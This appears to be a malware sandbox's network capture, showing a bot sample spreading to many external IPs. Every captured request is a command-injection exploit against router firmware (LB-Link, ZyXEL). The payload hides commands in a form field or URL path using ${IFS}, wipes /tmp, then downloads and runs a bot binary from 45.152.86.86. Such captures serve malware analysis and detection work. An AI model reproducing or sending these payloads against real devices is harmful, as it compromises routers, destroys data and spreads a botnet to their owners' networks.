                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:01.060494900 CEST411INHTTP/1.1 404 Not Found
                              Date: Sun, 31 Mar 2024 13:41:59 GMT
                              Server: Webs
                              X-Frame-Options: SAMEORIGIN
                              Cache-Control: no-cache
                              Content-Length: 166
                              Content-Type: text/html
                              Connection: keep-alive
                              Keep-Alive: timeout=60, max=99
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              7877192.168.2.1343750192.220.229.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265384912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7878192.168.2.1352314145.93.128.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265454054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7879192.168.2.135360098.58.235.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265515089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7880192.168.2.1360214207.74.211.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265574932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7881192.168.2.1337198122.239.169.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265640020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7882192.168.2.1353452182.0.143.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265698910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7883192.168.2.133950668.170.201.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265763998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7884192.168.2.134157470.50.175.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265796900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7885192.168.2.135459284.216.146.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265858889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7886192.168.2.135076097.97.100.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265907049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7887192.168.2.1339228210.131.184.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.265954018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7888192.168.2.133929452.176.214.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266017914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7889192.168.2.133346059.176.213.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266066074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7890192.168.2.1350290191.126.22.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266105890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7891192.168.2.133647487.207.168.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266153097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7892192.168.2.134066260.160.208.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266181946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7893192.168.2.1356254223.154.123.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266242027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7894192.168.2.1334662144.56.126.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266271114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7895192.168.2.1340186106.157.245.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266299963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7896192.168.2.134600671.188.19.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266331911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7897192.168.2.134024014.244.83.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266366005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7898192.168.2.1335106169.81.61.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266412020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7899192.168.2.135706477.41.221.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266460896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7900192.168.2.133918095.97.175.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266479015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7901192.168.2.134512412.56.204.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266566038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7902192.168.2.133877062.141.102.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266597033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7903192.168.2.1357906217.83.215.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266674042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7904192.168.2.1343246174.5.177.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266732931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7905192.168.2.135087664.249.106.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266772032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7906192.168.2.13386988.43.228.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266817093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7907192.168.2.13567989.158.245.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266869068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7908192.168.2.134958413.210.44.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266897917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7909192.168.2.13551848.14.190.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266942024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7910192.168.2.1347748189.149.252.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.266989946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7911192.168.2.1336334166.162.187.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267044067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7912192.168.2.135382687.137.14.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267102957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7913192.168.2.13447122.225.28.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267144918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7914192.168.2.134003420.160.210.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267195940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7915192.168.2.1357790222.1.253.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267250061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7916192.168.2.1355106208.169.205.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267312050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7917192.168.2.1343476160.191.184.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267368078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7918192.168.2.1350446223.203.13.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267442942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7919192.168.2.1340790172.90.120.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267488956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7920192.168.2.1340232142.3.148.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267544985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7921192.168.2.1354716179.85.249.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267594099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7922192.168.2.1348904213.222.78.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267625093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7923192.168.2.133373680.213.11.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267678976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7924192.168.2.1360050223.76.129.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267740965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7925192.168.2.1340076115.158.155.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267812967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7926192.168.2.1346616129.247.72.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267841101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7927192.168.2.1334890154.74.148.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267887115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7928192.168.2.133375812.41.185.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267930984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7929192.168.2.1337676115.90.67.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.267978907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7930192.168.2.1346284160.205.217.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268027067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7931192.168.2.1337060158.1.182.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268059015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7932192.168.2.13500522.89.47.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268136024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7933192.168.2.1336172203.4.231.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268188000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7934192.168.2.134065268.77.242.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268249035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7935192.168.2.1352878105.99.92.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268312931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7936192.168.2.135602081.100.136.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268349886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7937192.168.2.1346784219.52.224.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268402100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7938192.168.2.1355118143.64.91.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268501043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7939192.168.2.133427291.5.168.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268529892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7940192.168.2.1360730177.5.214.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:01.268567085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7941192.168.2.1342092124.181.99.228443
                              TimestampBytes transferredDirectionData
